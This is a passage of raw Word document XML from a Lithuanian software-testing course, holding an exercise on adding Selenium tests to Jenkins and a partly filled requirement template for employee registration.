    <w:p w:rsidR="009D6E00" w:rsidRDefault="005406D4" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Sukurkite nesudėtingą Selenium testą. Pridė</w:t>
      </w:r>
      <w:r w:rsidR="00697283" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">kite jį </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>prie jau turimų testų, automati</w:t>
      </w:r>
      <w:r w:rsidR="00697283" w:rsidRPr="00AD4464">
        <w:t>š</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidR="00710986" w:rsidRPr="00AD4464">
        <w:t>ai vykdomų per Jenkins sistemą</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00710986" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>UŽDUOTIES TIKSLAS</w:t>
      </w:r>
      <w:r w:rsidR="00CF3E01" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00870DB7" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="003C659A" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>šmokti paleisti (pridėti/ išimti) Selenium testus Jenkins sistemoje, patikrinti vykdymo rezultatus.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00D67C4A" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="133" w:name="_Toc14392441"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Kompetencija. Analizuoti skirtingų tipų reikalavimus, apibūdinančius kompiuterinę programą.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="133"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00D67C4A"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bookmarkStart w:id="134" w:name="_Toc14392442"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Mokymosi rezultatas. Vykdyti reikalavimų peržiūros procesą naudojant vartotojo pasakojimo reikalavimų programinei įrangai formatą.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="134"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="008D6926" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00C72318" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C72318" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="00B7341D" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>REIKALAVIMŲ PRO</w:t>
      </w:r>
      <w:r w:rsidR="00A10615" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>GRAMINEI ĮRANGAI FORMATAI</w:t>
      </w:r>
      <w:r w:rsidR="00AD6C03">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B7341D" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Pateiktam reikalavimui: a) nustatyti reikalavimo formatą; b) sudaryti testavimo atvejų sąrašą (d</w:t>
      </w:r>
      <w:r w:rsidR="007A2A80" w:rsidRPr="00AD4464">
        <w:t>etalių žingsnių kurti nereikia)</w:t>
      </w:r>
      <w:r w:rsidR="00AD6C03">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="007A2A80" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>UŽDUOTIES TIKSLAS</w:t>
      </w:r>
      <w:r w:rsidR="0059750E" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="0059750E" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Gebėti atskirti funkcinių reikalavimų formatus bei mokėti apibrėžti testavimo apimtis remiantis funkcinių reikalavimų dokumentais (nepriklausomai nuo formato).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidRDefault="0059750E" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9217" w:type="dxa"/>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2164"/>
        <w:gridCol w:w="823"/>
        <w:gridCol w:w="1810"/>
        <w:gridCol w:w="795"/>
        <w:gridCol w:w="2662"/>
        <w:gridCol w:w="963"/>
      </w:tblGrid>
      <w:tr w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidTr="00EA6F32">
        <w:trPr>
          <w:trHeight w:val="289"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="0059750E" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Reikalavimas #:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidRDefault="0059750E" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="823" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidRDefault="0059750E" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>R1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1810" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidRDefault="0059750E" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Reikalavimo tipas:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="795" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidRDefault="0059750E" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2662" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidRDefault="0059750E" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Įvykis/panaudojimo atvejis #:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidRDefault="0059750E" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidTr="00EA6F32">
        <w:trPr>
          <w:trHeight w:val="252"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidRDefault="0059750E" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="823" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidRDefault="0059750E" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1810" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidRDefault="0059750E" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="795" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidRDefault="0059750E" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2662" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidRDefault="0059750E" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="963" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidRDefault="0059750E" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidTr="00EA6F32">
        <w:trPr>
          <w:trHeight w:val="493"/>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Aprašymas:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7053" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidRDefault="0059750E" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Sistema turi leisti registruotis bendrovės darbuotojui</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidTr="00EA6F32">
        <w:trPr>
          <w:trHeight w:val="240"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidRDefault="0059750E" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="823" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidRDefault="0059750E" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1810" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidRDefault="0059750E" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="795" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidRDefault="0059750E" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2662" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidRDefault="0059750E" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="963" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidRDefault="0059750E" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidTr="00EA6F32">
        <w:trPr>
          <w:trHeight w:val="276"/>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Pagrindimas:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7053" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidRDefault="0059750E" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Darbuotojas gali suklysti įvedinėjant registravimosi duomenis, todėl reikalinga galimybė juos pakoreguoti.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidTr="00EA6F32">
        <w:trPr>
          <w:trHeight w:val="240"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidRDefault="0059750E" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="823" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidRDefault="0059750E" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1810" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidRDefault="0059750E" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="795" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidRDefault="0059750E" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2662" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidRDefault="0059750E" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="963" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidRDefault="0059750E" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidTr="00EA6F32">
        <w:trPr>
          <w:trHeight w:val="252"/>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Šaltinis:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7053" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidRDefault="0059750E" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Bendrovės darbuotojas.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidTr="00EA6F32">
        <w:trPr>
          <w:trHeight w:val="493"/>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Tinkamumo kriterijus:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7053" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidRDefault="0059750E" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Atidaromas pagrindinis sistemos langas su priregistravimo kortele.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidTr="00EA6F32">
        <w:trPr>
          <w:trHeight w:val="240"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidRDefault="0059750E" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="823" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidRDefault="0059750E" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1810" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidRDefault="0059750E" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="795" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidRDefault="0059750E" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2662" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidRDefault="0059750E" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="963" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidRDefault="0059750E" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidTr="00EA6F32">
        <w:trPr>
          <w:trHeight w:val="252"/>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Priklausomybės:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2633" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidRDefault="0059750E" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Nėra</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3457" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidRDefault="0059750E" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
